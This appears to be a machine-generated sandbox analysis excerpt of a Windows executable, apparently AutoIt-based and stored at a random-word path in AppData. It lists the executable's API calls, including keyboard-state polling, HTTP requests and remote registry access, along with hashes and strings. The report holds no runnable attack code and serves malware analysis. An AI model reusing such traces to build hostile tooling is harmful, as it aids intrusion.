                            • GetDlgItem.USER32(?,00000002), ref: 0043586A
                            • GetWindowRect.USER32(00000000,?), ref: 0043587C
                            • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                            • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                            • GetWindowRect.USER32(00000000,?), ref: 004358EE
                            • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                            • GetDlgItem.USER32(?,000003EA), ref: 00435941
                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                            Similarity
                            • API ID: Window$ItemMoveRect$Invalidate
                            • String ID:
                            • API String ID: 3096461208-0
                            APIs
                            • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                            • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                            • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                            • DeleteObject.GDI32(?), ref: 0047151E
                            • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                            • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                            • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                            • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                            • DeleteObject.GDI32(?), ref: 004715EA
                            • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                            Similarity
                            • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                            • String ID:
                            • API String ID: 3218148540-0
                            APIs
                            Similarity
                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                            • String ID:
                            • API String ID: 136442275-0
                            APIs
                            • _wcsncpy.LIBCMT ref: 00467490
                            • _wcsncpy.LIBCMT ref: 004674BC
                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                            • _wcstok.LIBCMT ref: 004674FF
                              • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                            • _wcstok.LIBCMT ref: 004675B2
                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                            • _wcslen.LIBCMT ref: 00467793
                            • _wcscpy.LIBCMT ref: 00467641
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            • _wcslen.LIBCMT ref: 004677BD
                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                              • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                            Strings
                            Similarity
                            • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                            • String ID: X
                            • API String ID: 3104067586-3081909835
                            APIs
                            • OleInitialize.OLE32(00000000), ref: 0046CBC7
                            • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                            • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                            • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                            • _wcslen.LIBCMT ref: 0046CDB0
                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                            • CoTaskMemFree.OLE32(?), ref: 0046CE42
                            • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                              • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                              • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                              • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                            Strings
                            • NULL Pointer assignment, xrefs: 0046CEA6
                            Similarity
                            • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                            • String ID: NULL Pointer assignment
                            • API String ID: 440038798-2785691316
                            APIs
                            • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                            • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                            • _wcslen.LIBCMT ref: 004610A3
                            • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                            • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                            • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                            • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                            • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                            • GetWindowRect.USER32(?,?), ref: 00461248
                              • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                            Strings
                            Similarity
                            • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                            • String ID: ThumbnailClass
                            • API String ID: 4136854206-1241985126
                            APIs
                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                            • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                            • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                            • GetClientRect.USER32(?,?), ref: 00471A1A
                            • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                            • DestroyIcon.USER32(?), ref: 00471AF4
                            Strings
                            Similarity
                            • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                            • String ID: 2
                            • API String ID: 1331449709-450215437
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                            • __swprintf.LIBCMT ref: 00460915
                            • __swprintf.LIBCMT ref: 0046092D
                            • _wprintf.LIBCMT ref: 004609E1
                            Strings
                            Similarity
                            • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                            • API String ID: 3054410614-2561132961
                            APIs
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                            • CLSIDFromString.OLE32(?,?), ref: 004587B3
                            • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                            • RegCloseKey.ADVAPI32(?), ref: 004587C5
                            Strings
                            Similarity
                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                            • API String ID: 600699880-22481851
                            APIs
                            Strings
                            Similarity
                            • API ID: DestroyWindow
                            • String ID: static
                            • API String ID: 3375834691-2160076837
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                            • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Similarity
                            • API ID: ErrorMode$DriveType
                            • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                            APIs
                              • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                            • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                            • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                            • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                            • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                            • DeleteObject.GDI32(006D0000), ref: 00470A04
                            • DestroyIcon.USER32(00000070), ref: 00470A1C
                            • DeleteObject.GDI32(89250095), ref: 00470A34
                            • DestroyWindow.USER32(00610074), ref: 00470A4C
                            • DestroyIcon.USER32(?), ref: 00470A73
                            • DestroyIcon.USER32(?), ref: 00470A81
                            • KillTimer.USER32(00000000,00000000), ref: 00470B00
                            Similarity
                            • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                            • String ID:
                            APIs
                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                            • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                            • VariantInit.OLEAUT32(?), ref: 004793E1
                            • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                            • VariantCopy.OLEAUT32(?,?), ref: 00479461
                            • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                            • VariantClear.OLEAUT32(?), ref: 00479489
                            • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                            • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                            • VariantClear.OLEAUT32(?), ref: 004794CA
                            • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                            Similarity
                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                            • String ID:
                            APIs
                            • GetKeyboardState.USER32(?), ref: 0044480E
                            • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                            • GetKeyState.USER32(000000A0), ref: 004448AA
                            • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                            • GetKeyState.USER32(000000A1), ref: 004448D9
                            • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                            • GetKeyState.USER32(00000011), ref: 00444903
                            • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                            • GetKeyState.USER32(00000012), ref: 0044492D
                            • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                            • GetKeyState.USER32(0000005B), ref: 00444958
                            Similarity
                            • API ID: State$Async$Keyboard
                            • String ID:
                            APIs
                            Similarity
                            • API ID: InitVariant$_malloc_wcscpy_wcslen
                            • String ID:
                            APIs
                            Strings
                            Similarity
                            • API ID: AddressProc_free_malloc$_strcat_strlen
                            • String ID: AU3_FreeVar
                            APIs
                            • CoInitialize.OLE32 ref: 0046C63A
                            • CoUninitialize.OLE32 ref: 0046C645
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                              • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                            • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                            • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                            • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                            • IIDFromString.OLE32(?,?), ref: 0046C705
                            Strings
                            Similarity
                            • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                            APIs
                              • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                              • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                              • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                              • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                            • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                            • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                            • ImageList_EndDrag.COMCTL32 ref: 00471169
                            • ReleaseCapture.USER32 ref: 0047116F
                            • SetWindowTextW.USER32(?,00000000), ref: 00471206
                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                            Strings
                            Similarity
                            • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                            APIs
                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                            • _wcslen.LIBCMT ref: 00450720
                            • _wcscat.LIBCMT ref: 00450733
                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                            • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                            Strings
                            Similarity
                            • API ID: MessageSend$Window_wcscat_wcslen
                            • String ID: -----$SysListView32
                            APIs
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                            • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                            • GetParent.USER32 ref: 00469C98
                            • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                            • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                            • GetParent.USER32 ref: 00469CBC
                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                            Strings
                            Similarity
                            • API ID: MessageSend$CtrlParent$_memmove_wcslen
                            • String ID: ComboBox$ListBox
                            APIs
                            Similarity
                            • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                            • String ID:
                            APIs
                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                            • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                            • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                            • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                            • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                            • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                            Similarity
                            • API ID: MessageSend$LongWindow
                            • String ID:
                            APIs
                              • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                            • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                            • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                              • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                            Similarity
                            • API ID: MessageSend$BrushCreateDeleteObjectSolid
                            • String ID:
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00434643
                            • GetForegroundWindow.USER32(00000000), ref: 00434655
                            • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                            • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                            Similarity
                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                            • String ID:
                            • API String ID: 2156557900-0
                            • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                            • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                            • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                            • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                            Strings
                            Similarity
                            • API ID:
                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                            • API String ID: 0-1603158881
                            • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                            • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                            • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                            • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                            APIs
                            • CreateMenu.USER32 ref: 00448603
                            • SetMenu.USER32(?,00000000), ref: 00448613
                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                            • IsMenu.USER32(?), ref: 004486AB
                            • CreatePopupMenu.USER32 ref: 004486B5
                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                            • DrawMenuBar.USER32 ref: 004486F5
                            Strings
                            Similarity
                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                            • String ID: 0
                            • API String ID: 161812096-4108050209
                            • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                            • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                            • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                            • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\AppData\Local\inhumate\incalculability.exe), ref: 00434057
                            • LoadStringW.USER32(00000000), ref: 00434060
                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                            • LoadStringW.USER32(00000000), ref: 00434078
                            • _wprintf.LIBCMT ref: 004340A1
                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                            Strings
                            • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                            • C:\Users\user\AppData\Local\inhumate\incalculability.exe, xrefs: 00434040
                            Similarity
                            • API ID: HandleLoadModuleString$Message_wprintf
                            • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\AppData\Local\inhumate\incalculability.exe
                            • API String ID: 3648134473-575510335
                            • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                            • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                            • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                            • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                            • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                            • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                            • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                            APIs
                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\inhumate\incalculability.exe,0040F545,C:\Users\user\AppData\Local\inhumate\incalculability.exe,004A90E8,C:\Users\user\AppData\Local\inhumate\incalculability.exe,?,0040F545), ref: 0041013C
                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                            • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                            • MoveFileW.KERNEL32(?,?), ref: 00453932
                            Similarity
                            • API ID: File$AttributesFullMoveNamePathlstrcmpi
                            • String ID:
                            • API String ID: 978794511-0
                            • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                            • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                            • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                            • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                            • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                            • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                            • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                            APIs
                            Similarity
                            • API ID: ClearVariant
                            • String ID:
                            • API String ID: 1473721057-0
                            • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                            • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                            • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                            • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                            APIs
                            Strings
                            Similarity
                            • API ID: _memmove$_memcmp
                            • String ID: '$\$h
                            • API String ID: 2205784470-1303700344
                            • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                            • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                            • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                            • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                            APIs
                            • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                            • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                            • VariantClear.OLEAUT32 ref: 0045EA6D
                            • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                            • __swprintf.LIBCMT ref: 0045EC33
                            • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                            Strings
                            • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                            Similarity
                            • API ID: Variant$InitTime$ClearCopySystem__swprintf
                            • String ID: %4d%02d%02d%02d%02d%02d
                            • API String ID: 2441338619-1568723262
                            • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                            • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                            • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                            • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                            APIs
                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                            • Sleep.KERNEL32(0000000A), ref: 0042C67F
                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                            Strings
                            Similarity
                            • API ID: Interlocked$DecrementIncrement$Sleep
                            • String ID: @COM_EVENTOBJ
                            • API String ID: 327565842-2228938565
                            • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                            • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                            • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                            • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                            APIs
                            • VariantClear.OLEAUT32(?), ref: 0047031B
                            • VariantClear.OLEAUT32(?), ref: 0047044F
                            • VariantInit.OLEAUT32(?), ref: 004704A3
                            • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                            • VariantClear.OLEAUT32(?), ref: 00470516
                              • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                            • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                              • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                            • VariantClear.OLEAUT32(00000000), ref: 0047060D
                            Strings
                            Similarity
                            • API ID: Variant$Clear$Copy$CallDispFuncInit
                            • String ID: H
                            • API String ID: 3613100350-2852464175
                            • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                            • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                            • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                            • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                            APIs
                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                            • DestroyWindow.USER32(?), ref: 00426F50
                            • UnregisterHotKey.USER32(?), ref: 00426F77
                            • FreeLibrary.KERNEL32(?), ref: 0042701F
                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                            Strings
                            Similarity
                            • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                            • String ID: close all
                            APIs
                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                            • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                            Strings
                            Similarity
                            • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                            APIs
                            • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                            • IsMenu.USER32(?), ref: 0045FC5F
                            • CreatePopupMenu.USER32 ref: 0045FC97
                            • GetMenuItemCount.USER32(?), ref: 0045FCFD
                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                            Strings
                            Similarity
                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                            • String ID: 0$2
                            APIs
                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                            • VariantClear.OLEAUT32(?), ref: 00435320
                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                            • VariantClear.OLEAUT32(?), ref: 004353B3
                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                            Strings
                            Similarity
                            • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                            • String ID: crts
                            APIs
                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\inhumate\incalculability.exe,0040F545,C:\Users\user\AppData\Local\inhumate\incalculability.exe,004A90E8,C:\Users\user\AppData\Local\inhumate\incalculability.exe,?,0040F545), ref: 0041013C
                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                            • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                            • _wcscat.LIBCMT ref: 0044BCAF
